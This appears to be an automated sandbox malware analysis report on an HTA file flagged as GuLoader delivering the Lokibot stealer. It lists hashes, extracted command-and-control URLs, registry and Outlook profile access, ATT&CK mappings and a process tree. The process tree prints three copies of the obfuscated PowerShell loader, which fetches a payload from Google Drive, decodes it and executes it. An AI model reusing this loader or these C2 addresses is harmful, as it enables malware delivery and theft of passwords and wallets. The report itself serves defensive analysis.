guloader | 3023bc189f377a809d054529454fa9e35af817f3c9c3646c15d2d4da468676bf

General

Target

LV24-0926.hta
Size

7KB
MD5

b604a446f056b778a22cf7ea6a6676ae
SHA1

c198b474688cc106f9fc06cc6b9e569613f5e689
SHA256

3023bc189f377a809d054529454fa9e35af817f3c9c3646c15d2d4da468676bf
SHA512

4f54f91862b9fe8494cefbca8dae42cc930839206508fae41e0d3688b12a5e7bafa1eb0da6369daaa77af6db62cac02360b217a1a090a904b3a2720cdd6edd4e
SSDEEP

192:hlN6ZVy2gAkJkhRg9e+UEmOVYpUVM2vy6n2MbIv:hqZVy2COhDNG1v9LIv

Score

10^/10

guloader lokibot collection discovery downloader spyware stealer trojan

Malware Config

Extracted

Family

lokibot

C2

http://168.100.10.152/index.php/wp.php?view=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

Blocklisted process makes network request 11 IoCs

flow	pid	Process
16	3836	powershell.exe
18	3836	powershell.exe
32	1020	msiexec.exe
34	1020	msiexec.exe
36	1020	msiexec.exe
38	1020	msiexec.exe
39	1020	msiexec.exe
54	1020	msiexec.exe
56	1020	msiexec.exe
57	1020	msiexec.exe
64	1020	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	mshta.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	drive.google.com
16	drive.google.com
32	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1020	msiexec.exe
1020	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4496	powershell.exe
1020	msiexec.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4496 set thread context of 1020	4496	powershell.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3836	powershell.exe
3836	powershell.exe
1428	powershell.exe
1428	powershell.exe
4496	powershell.exe
4496	powershell.exe
4496	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4496	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	1020	msiexec.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2632 wrote to memory of 3836	2632	mshta.exe	84
PID 2632 wrote to memory of 3836	2632	mshta.exe	84
PID 2632 wrote to memory of 3836	2632	mshta.exe	84
PID 4496 wrote to memory of 1020	4496	powershell.exe	96
PID 4496 wrote to memory of 1020	4496	powershell.exe	96
PID 4496 wrote to memory of 1020	4496	powershell.exe	96
PID 4496 wrote to memory of 1020	4496	powershell.exe	96
PID 4496 wrote to memory of 1020	4496	powershell.exe	96

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	msiexec.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\LV24-0926.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2632
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4496
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Accesses Microsoft Outlook profiles
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:1020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
712a00a9d8164b3b6795c4e11800d2f1

SHA1
82952ef15a2e4e2b06cb149d3b206d11135128b5

SHA256
2a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052

SHA512
ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
b45079dac12ff894d26bbe57ea686672

SHA1
af17fd9e775f27100f426c855ac18389f84c57c5

SHA256
7c7c3ddc719e8103090ee913eef14fc10935b440223ec51df331262125d495cf

SHA512
a4def28c1fc2f26f83107512be6c6e736d3f29d9375f30d507d241d033ca591c3de2848f4c219abfa3279fcd7fbb158a1ad79166732d9aded5a05c224097a99c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7b729b76807ea4216b633128f80dfded

SHA1
0affad81c35b6870bb7a8753be50c5b28551f922

SHA256
af667295e8d9d0582c76b18f6f4665bf6f22d0693cb36e55c5d31d6fa99f48cc

SHA512
3eddd456de350c50b9f18a259af572167f47afb28f42968ba716e9aa8c0d07d65fa5fcbeda1057f3382532bc04e0675c336a901c6c497ddcae5778d7c2ba8fb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cefp4wbq.oxj.ps1

Filesize
60B

MD5
